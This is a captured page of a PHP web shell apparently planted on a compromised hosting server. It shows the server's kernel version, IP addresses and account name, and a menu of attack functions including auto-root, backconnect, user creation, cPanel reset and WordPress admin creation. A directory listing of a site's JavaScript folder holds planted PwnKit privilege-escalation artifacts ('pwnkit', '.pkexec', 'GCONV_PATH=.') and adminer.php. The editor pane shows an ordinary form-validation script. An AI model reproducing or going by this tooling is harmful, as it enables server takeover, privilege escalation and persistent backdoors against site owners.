Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.210
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS-NEW /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ace.js
798
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
apexcharts.js
12.18
KB
-rw-r--r--
app.js
251.9
KB
-rw-r--r--
bootstrap-colorpicker.js
74
B
-rw-r--r--
bootstrap-maxlength.js
795
B
-rw-r--r--
carousel.js
1.74
KB
-rw-r--r--
chartjs.js
6.56
KB
-rw-r--r--
chat.js
586
B
-rw-r--r--
cropper.js
1.43
KB
-rw-r--r--
dashboard.js
11.76
KB
-rw-r--r--
data-table.js
823
B
-rw-r--r--
datepicker.js
369
B
-rw-r--r--
demo.js
203
B
-rw-r--r--
dropify.js
64
B
-rw-r--r--
dropzone.js
98
B
-rw-r--r--
email.js
280
B
-rw-r--r--
form-validation.js
1.59
KB
-rw-r--r--
fullcalendar.js
10.09
KB
-rw-r--r--
inputmask.js
99
B
-rw-r--r--
jquery.flot.js
5.18
KB
-rw-r--r--
morris.js
1.65
KB
-rw-r--r--
peity.js
211
B
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
select2.js
228
B
-rw-r--r--
simplemde.js
187
B
-rw-r--r--
sparkline.js
2.98
KB
-rw-r--r--
spinner.js
300
B
-rw-r--r--
sweet-alert.js
4.9
KB
-rw-r--r--
tags-input.js
270
B
-rw-r--r--
template.js
4.05
KB
-rw-r--r--
timepicker.js
134
B
-rw-r--r--
tinymce.js
876
B
-rw-r--r--
typeahead.js
1.88
KB
-rw-r--r--
wizard.js
294
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : form-validation.js
$(function() { 'use strict'; $.validator.setDefaults({ submitHandler: function() { alert("submitted!"); } }); $(function() { // validate signup form on keyup and submit $("#signupForm").validate({ rules: { name: { required: true, minlength: 3 }, password: { required: true, minlength: 5 }, confirm_password: { required: true, minlength: 5, equalTo: "#password" }, email: { required: true, email: true }, topic: { required: "#newsletter:checked", minlength: 2 }, agree: "required" }, messages: { name: { required: "Please enter a name", minlength: "Name must consist of at least 3 characters" }, password: { required: "Please provide a password", minlength: "Your password must be at least 5 characters long" }, confirm_password: { required: "Please provide a password", minlength: "Your password must be at least 5 characters long", equalTo: "Please enter the same password as above" }, email: "Please enter a valid email address", }, errorPlacement: function(label, element) { label.addClass('mt-2 text-danger'); label.insertAfter(element); }, highlight: function(element, errorClass) { $(element).parent().addClass('has-danger') $(element).addClass('form-control-danger') } }); }); });
Close